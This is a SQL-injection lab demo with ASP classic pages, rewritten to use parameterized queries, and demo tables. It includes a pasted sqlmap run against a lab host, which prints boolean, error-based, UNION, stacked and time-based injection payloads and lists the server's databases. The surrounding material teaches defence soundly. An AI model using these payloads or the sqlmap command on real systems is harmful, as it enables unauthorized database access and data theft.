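<%
' Product lookup page from the article's GET-based SQL-injection demo.
' The article's original version built the statement by string concatenation:
'   query = "select prodName from products where id = " & prodId
' so whatever arrived in the "id" query-string parameter became part of the SQL
' text. That is the injection point the sqlmap run further down reports.
' This version binds "id" as a typed parameter, so the request value can never
' change the structure of the statement.
Option Explicit

Dim prodId, conn, cmd, rs

prodId = Request.QueryString("id")

' products.id is an int (see the CREATE TABLE below). Rejecting non-numeric
' input up front gives a clean "not found" instead of an ADO type error; the
' real protection against injection is the parameter binding further down.
If Not IsNumeric(prodId) Then
    Response.Write "No product found"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
' Same connection string as the article. It logs in as "sa", so any flaw in
' this page runs with full server rights — which is why the sqlmap session
' below can list every database on the instance. A production page should use
' a login that can only read the products table.
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=数据库; User Id=sa; Password=密码"

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select prodName from products where id = ?"
' 3 = adInteger, 1 = adParamInput (ADO constants; adovbs.inc is not included here)
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , CLng(prodId))

Set rs = cmd.Execute

If Not rs.EOF Then
    ' HTMLEncode so the stored name is rendered as text, not as markup
    Response.Write "Got product " & Server.HTMLEncode(rs.Fields("prodName").Value)
Else
    Response.Write "No product found"
End If

rs.Close
conn.Close
%>

SQL语句: 创建一个数据库,然后查询这些

-- Demo table for the lookup page above. The article's version had a trailing
-- comma after the last column; it is removed here and id is declared the key.
create table products
(
    id int identity(1,1) not null,
    prodName varchar(50) not null,
    constraint products_pk primary key (id)
)

insert into products(prodName) values('1')
insert into products(prodName) values('2')
insert into products(prodName) values('3')

root@Dis9Team:/pen# sqlmap -u "http://5.5.5.134/sql.asp?id=1" --dbs

sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool
http://www.2cto.com

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.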
Authors assume no liability and are not responsible for any misuse or damage caused by this program 07 08 [*] starting at 13:10:54 09 10 [13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file 11 [13:10:55] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file 12 [13:10:55] [INFO] testing connection to the target url 13 [13:10:55] [INFO] heuristics detected web page charset 'ascii' 14 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: 15 --- 16 Place: GET 17 Parameter: id 18 Type: boolean-based blind 19 Title: AND boolean-based blind - WHERE or HAVING clause 20 Payload: id=1 AND 2431=2431 21 22 Type: error-based 23 Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause 24 Payload: id=1 AND 5223=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58))) 25 26 Type: UNION query 27 Title: Generic UNION query (NULL) - 1 column 28 Payload: id=-3220 UNION SELECT CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(102)+CHAR(75)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(120)+CHAR(83)+CHAR(79)+CHAR(83)+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)-- 29 30 Type: stacked queries 31 Title: Microsoft SQL Server/Sybase stacked queries 32 Payload: id=1; WAITFOR DELAY '0:0:5';-- 33 34 Type: AND/OR time-based blind 35 Title: Microsoft SQL Server/Sybase time-based blind 36 Payload: id=1 WAITFOR DELAY '0:0:5'-- 37 --- 38 39 [13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server 40 web server operating system: Windows XP 41 web application technology: ASP, Microsoft IIS 5.1 42 back-end DBMS: Microsoft SQL Server 2005 43 [13:10:55] [INFO] fetching database names 44 [13:10:55] [INFO] the SQL query used returns 5 entries 45 [13:10:55] [INFO] retrieved: "master" 46 [13:10:55] [INFO] retrieved: "model" 47 [13:10:55] [INFO] retrieved: "msdb" 48 [13:10:55] [INFO] 
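retrieved: "myDB"
[13:10:55] [INFO] retrieved: "tempdb"
available databases [5]:
[*] master
[*] model
[*] msdb
[*] myDB
[*] tempdb

[13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'

[*] shutting down at 13:10:55

root@Dis9Team:/pen#

---------------------------------------------------伟大的分割线--
post sql
sql:

-- Demo table for the login page below.
-- NOTE(review): the demo stores passwords in clear text (see the inserts);
-- a real schema would hold a salted password hash, never the password itself.
create table users
(
    userId int identity(1,1) not null,
    userName varchar(50) not null,
    userPass varchar(20) not null
)

insert into users(userName, userPass) values('john', 'doe')
insert into users(userName, userPass) values('admin', 'wwz04ff')
insert into users(userName, userPass) values('fsmith', 'mypassword')

asp:

<%
' Login handler from the article's POST-based SQL-injection demo.
' The original concatenated userName and password straight into
'   "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"
' which is the injection point. It then tested "if not rs.eof": a COUNT(*)
' query always returns exactly one row, so that branch printed "Logged In" for
' every submission, whether or not the credentials matched. (The original
' listing also broke the query and the connection string across lines without
' a "_" continuation, which VBScript does not accept.)
' This version binds both values as parameters and selects a matching row, so
' EOF really means "no such user/password pair".
Option Explicit

Dim userName, password, conn, cmd, rs

userName = Request.Form("userName")
password = Request.Form("password")

Set conn = Server.CreateObject("ADODB.Connection")
' Same connection string as the article: "sa" with an empty password.
' A login limited to reading the users table should be used instead.
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password="

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select userId from users where userName = ? and userPass = ?"
' 200 = adVarChar, 1 = adParamInput; the sizes match the users table definition
cmd.Parameters.Append cmd.CreateParameter("userName", 200, 1, 50, userName)
cmd.Parameters.Append cmd.CreateParameter("userPass", 200, 1, 20, password)

Set rs = cmd.Execute

If Not rs.EOF Then
    Response.Write "Logged In"
Else
    Response.Write "Bad Credentials"
End If

rs.Close
conn.Close
%>

HTML提交表单:

<form name="frmLogin" action="ASP.asp" method="post">
    Username: <input type="text" name="userName">
    <!-- type="password" so the browser masks the value; the article's form used type="text" -->
    Password: <input type="password" name="password">
    <input type="submit">
</form>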